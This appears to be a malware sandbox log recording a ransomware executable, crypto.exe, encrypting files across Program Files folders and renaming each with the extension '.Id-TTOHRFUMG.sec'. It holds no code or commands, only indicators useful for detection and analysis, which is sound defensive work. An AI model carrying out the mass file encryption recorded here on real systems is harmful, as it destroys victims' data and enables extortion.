File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec64.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\MP00132_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03459_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\it.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\stdole.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-previous-static.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152688.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Composite.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_choosecolor.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\1033\STSUCRES.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+1.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\libxslt.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OLMAPI32.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jmx.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Belize.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01169_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105710.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21313_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\error_window.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Marquesas.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\UTC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\BROCHURE.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGPQUOT.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\fr.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00441_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN089.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annots.api.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationUp_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR14F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\J0143754.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\NL7Models0011.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\softokn3.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\base-docked.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01749_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107132.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\ONENOTE_COL.HXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_alignleft.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_choosecolor.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Wordconv.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00261_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chihuahua.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Apia.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01138_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0212957.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-last-quarter.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\TravelIntroToMain_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\GMT+11.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Tarawa.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE01172_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\XLINTL32.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OUTLRPC.DLL.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-threaddump.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\GMT-12.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\SystemV\HST10.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241043.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00157_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_MCELogo_mouseover.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\36.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0075478.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\Media Renderer\avtransport.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\NAMEEXT.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00234_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Argentina\Mendoza.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Tokyo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200377.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285796.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\MessageAttachmentIconImagesMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\gadget.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\logo.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\sa.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\server\classes.jsa.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0230553.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Americana.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\RESP98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\WidevineCdm\LICENSE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01603_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_rest.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\extcheck.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_rgb.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\file_obj.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Africa\Nairobi.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\js\ui.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libposterize_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\SecretST.TTF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-templates.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200189.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0290548.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\[email protected]	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\icudt36.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Push\pushplaysubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\1047x576black.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\epl-v10.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-spi-quicksearch.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02453_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\spu\liblogo_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\boot_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21319_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107724.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsHomePageScript.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPAPERS.INI.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MEDCAT.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\3difr.x3d.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00736_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_stats_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\about.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SCHDREQ.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\uarrow.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00254_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Module.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\SETLANG_COL.HXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\logger\libconsole_logger_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\wlsrvc.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\jawt.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Monrovia.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\LABEL98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\weather.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationLeft_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.preferences_3.5.200.v20140224-1527.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-favorites.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382970.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\VelvetRose.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OneNote\SendToOneNOteFilter.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGCAL.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\equalizer_window.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\license.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\weather.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239063.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL082.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\ORIG98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Photo Viewer\ImagingDevices.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\about.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-queries.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsImageTemplate.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-javahelp_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Edmonton.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Halifax.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0293238.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR3B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationUp_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\logo.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libshm_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\security\local_policy.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIcon.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\info.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belize.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\WET.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00350_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsColorChart.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_output\libdirect3d9_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.server_8.1.14.v20131031.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-4.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_m.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Sitka.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\Bear_Formatted_RGB6_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Beige.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\excel.exe.manifest.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\leftnav.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Cuiaba.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB02229_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0199661.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\ChessIconImages.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\mscss7cm_es.dub.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_top.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\SmallLogo.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239611.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04267_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105282.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02069J.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Solstice.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIcons.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Indian\Mahe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01168_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15169_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\highDpiImageSwap.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00915_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01473_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Perspective.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\RCLRPT.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Thunder_Bay.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_up.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\ct.sym.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-ui.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\bg_Country.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\WSSFilesToolIconImages.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\whitemenu.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_winxp.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\system_dot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Salta.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\BIZFORM.DPV.Id-TTOHRFUMG.sec	crypto.exe
